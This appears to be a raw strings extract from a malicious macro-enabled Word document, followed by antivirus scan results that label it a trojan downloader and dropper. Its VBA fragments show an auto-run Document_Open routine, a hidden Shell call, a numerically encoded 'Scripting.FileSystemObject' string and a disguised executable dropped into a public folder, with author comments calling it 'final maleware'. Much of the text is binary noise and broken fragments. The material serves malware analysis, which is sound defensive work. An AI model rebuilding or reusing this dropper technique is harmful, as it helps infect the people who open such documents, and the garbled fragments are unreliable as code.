0K/fLR
gHp/XHh
@]*DwW
g%B%.(
V@h3[f
'X-l]-
QzE1fV
]_eD^*#
$vPv/J
`~.P0Ye
/tvO2A
!Phz`Jc
[;U$R%W
1%rlzP
.*Scfe_UNS
le:U.c
q=$6:#
]*XB6f
ao,@h*
ylsm>?
gzqc|x
}6@/uo
pv&H`vU '
SQX@Oi
Z@E1(0
_0Ko%R`
g@omLX
$5Z|}a
$,[Y%)y
a6?bfd
Al**(1
o%kYbU
R;vS.7
hfYU/*
V-U4$K
H;BjRx(
J)?@"M
LiJuDv5R]
qj!{hn
g_U)3'
a%?*8D
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri
Normal.dotm
Microsoft Office Word
Specify the path to your executable
Specify the command to be executed
Specify window style (vbHide to minimize the window, but it might not fully detach)
Specify whether to wait for the process to finish (optional)
Run the process
Optionally, wait for the process to finish
Get the exit code of the process (optional)
Note: This may not be accurate if the process is still running
MsgBox "Error Code: " & errorCode
083099114105112116105110103046070105108101083121115116101109079098106101099116$
nothing
C:\\Users\\Public\\Documents\\MicrosoftWordUpdater.log'
run it
C:\\Users\\Public\\Documents\\ERORR Windows Reportin
final maleware
check file do not exist
malware use in (encode by python
''''''''''''''''''''''
MsgBox Err.Description
nothing
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
extB@ox1, 0
Functio
(str As S
Di`m out
counter
1 To Len
r((Val(M
", 36)
sg@3 (
EndB E3
G6eplay(D
A2lPoop1
vRun`(path
On ErroPr Go@Qe
>execu
waitOnRe
BooPlean
' Specif@y the "
o your
!`(vbHi
it mi
ght not
fully deptach
$roPcess
. Jc.C
6= Shel
l(D%,
' Note: aa
is@6ill r@unning
W:p " &
8wFileExi
em!5ObjecM
30991141
05112116
0103046
51081ip
10907909
!#Sub 5
C:\\Us
ers\\Pub`lic\\
icrosoft
WordUpd
@r.log"
ER ORR W
]s @Reportp
appa.w
en"Fby py
(nt 2#G
.Descri
TextBox1, 0, 0, MSForms, TextBox
MsgBox (out)
Attribut
e VB_Nam
e = "Use
rForm1"
914B01F4
-60CD-47
D0-A464-
AECF76BB
481C}{E2
430283-3
4A1-4619
-BC09-9D
D2FAE6EB
o False
Cr@eatabl
redecla
BE`xpose
emplateD
Cus tomiz
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
ForeColor
_GetInsideHeight
InsideHeight
_GetInsideWidthG
InsideWidth
KeepScrollBarsVisibleJj
MouseIcon
MousePointert
PictureAlignment
Picture
PictureSizeMode
PictureTilingW
ScrollBars
_SetScrollHeightZ
_GetScrollHeighta
ScrollHeight(j
_SetScrollLeft
_GetScrollLeft
ScrollLeftS
_SetScrollTop<T
_GetScrollTop
ScrollTopl-
_SetScrollWidth
_GetScrollWidthh
ScrollWidthbu
SelectedY
SpecialEffect
VerticalScrollBarSide
RedoActionc
Repaint
Scroll
SetDefaultTabOrderY
UndoAction
DesignMode#
ShowToolboxb6
ShowGridDotsIj
SnapToGrid
GridXe
_SetGridX
_GetGridX
GridYb
_SetGridY
_GetGridY
DrawBuffer
Label1
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
Shared\
OFFICE16
\MSO.DLL
M 16.0
52EE1-E0D8F
02608C4DP0BB4
M20L'B
28B4-571 E-444
1-AE9D40@6E378E
6U@sers\u@
\AppData
\Local\T
emp\Word
ThisDocu
*\CNormalrU
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
counter
delayS
loop1{w
erorr2`
executablePath
command
windowStyle
waitOnReturn-
errorCode0e
vbHide
ShellV
FileExist
filePath
fileSystem
CreateObject
FileExists
Document_Open
exe_path
mal_path
UserForm1)
TextBox1
fileNumber
MSFormsC
UserFormN
_B_var_fileNumber6O
_B_var_counter
_B_var_Mid
_B_var_Chr\;
_B_var_tmp1
_B_var_tmp2
_B_var_tmp3
_B_var_tmp4
QueryInterface
AddRef
Releaseoa
GetTypeInfoCountdm
GetTypeInfogP
GetIDsOfNames
InvokeW
ActiveControl
BackColor
BorderColor
BorderStyleS
CanPaste
CanRedo
CanUndo
Caption
Controls
Enabled
_Font_ReservedZ^
ThisDocument
UserForm1
Project
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\system32\FM20.DLL
MSForms
C:\Users\user1\AppData\Local\Temp\Word8.0\MSForms.exd
Document
TextBox1
FileExist
Document_Open
UserForm
F3Dynamic
VBE7.DLL
TextBox1
filePath
TextBox1"
Microsoft Forms 2.0 Form
Embedded Object
0770901440000030000000000040000000002552550000001840000000000000000000000640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010000000140311860140001800092050331840010762050330841041051150321121141111031140971090320990971101101111160320981010321141171100321051100320680790830321091111001010460130130100360000000000000000000000871112500840190141480070190141480070190141480070071011440060240141480070071011510060220141480070071011450061530141480070651231450060540141480070651231440060030141480070651231510060260141480070071011490060200141480070190141490071120141480072151231570060170141480072151231070070180141480072151231500060180141480070821050991040190141480070000000000000000000000000000000000000000000000000000000000000000000000000800690000001001340070001621330721020000000000000000000000002400000340000110020140290000740010000002260030000000000000000401690000000000160000000000000000640010000000000000160000000000020000000060000000000000000000000060000000000000
Tahoma
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1
Caption = "UserForm1"
ClientHeight = 3015
ClientLeft = 120
ClientTop = 465
ClientWidth = 4560
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 1
ThisDocument
UserForm1
ID="{8C8CFC9D-0331-4E89-9F3B-FD701B1718B1}"
Document=ThisDocumeP
nt/&H00000000
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=UserForm1
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="4F4DBA2E4AF6B2FAB2FAB2FAB2FA"
DPB="BBB94EC2BBC3BBC3BB"
GC="2725D276528EBF8FBF8F40"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
UserForm1=0, 0, 0, 0, C, 26, 26, 1425, 603, C
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
PxzSq]y<u
b!e9#i
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Root Entry
WordDocument
ObjectPool
_1777805678
CompObj
ObjInfo
OCXNAME
TextBox1
contents
1Table
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
UserForm1
(1Normal.ThisDocument
*\R8005*#5f
0{914B01F4-60CD-47D0-A464-AECF76BB481C}{E2430283-34A1-4619-BC09-9DD2FAE6EB94}
$*\Rffff*06685bfcc3
__SRP_4
__SRP_5
_VBA_PROJECT
AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library
__SRP_0
__SRP_1
UserForm1
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{2F8228B4-571E-444B-B211-AE9D406E378E}#2.0#0#C:\Users\user1\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
0:685c02da
ThisDocument
UserForm1
06685bfcc3
UserForm1
C:\\Users\\Public\\Documents\\MicrosoftWordUpdater.log
C:\\Users\\Public\\Documents\\ERORR Windows Reporting.exe(
083099114105112116105110103046070105108101083121115116101109079098106101099116
FileExists
CompObj
VBFrame
PROJECTwm
tThisDocument
1UserForm1
PROJECT
CompObj
Normal
Default Paragraph Font
Table Normal
No List
Unknown
Times New Roman
Symbol
Calibri
Calibri Light
Cambria Math
Antivirus Signature
Bkav W32.Common.3AD25B27
Lionic Trojan.MSWord.ObfDldr.b!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.OLE2.Suspicious.tg
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen433
tehtris Clean
ESET-NOD32 Win64/Agent.DZF
TrendMicro-HouseCall Clean
Avast VBA:Downloader-BMF [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Dropper.MSOffice.SDrop.gen
BitDefender VBA.Heur2.ObfDldr.9.01CA8320.Gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
MicroWorld-eScan VBA.Heur2.ObfDldr.9.01CA8320.Gen
Tencent Trojan.MsOffice.MacroS.11030723
TACHYON Suspicious/W97M.DRP.Gen
Sophos Clean
F-Secure Malware.W97M/AVA.Downloader.lwxgm
DrWeb Clean
VIPRE VBA.Heur2.ObfDldr.9.01CA8320.Gen
TrendMicro HEUR_VBA.O2
FireEye VBA.Heur2.ObfDldr.9.01CA8320.Gen
Emsisoft VBA.Heur2.ObfDldr.9.01CA8320.Gen (B)
huorong Clean
GData VBA.Heur2.ObfDldr.9.01CA8320.Gen
Jiangmin Clean
Varist ABRisk.ZIZZ-
Avira W97M/AVA.Downloader.lwxgm
Antiy-AVL Trojan[Downloader]/MSOffice.Agent
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit VBA.Heur2.ObfDldr.9.01CA8320.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Dropper.MSOffice.SDrop.gen
Microsoft Trojan:Win32/Leonem
Google Detected.Heuristic.Script
AhnLab-V3 Trojan/DOC.Agent
Acronis suspicious
McAfee Clean
MAX malware (ai score=89)
VBA32 Clean
Zoner Clean
Rising Trojan.Agent!8.B1E (TOPIS:E0:rYd0cec0tnN)
Yandex Clean
Ikarus VBA.ObfDldr
MaxSecure Clean
Fortinet VBA/Dloader.BMF!tr
BitDefenderTheta Clean
AVG VBA:Downloader-BMF [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan[dropper]:MSOffice/SDrop.gyf
No IRMA results available.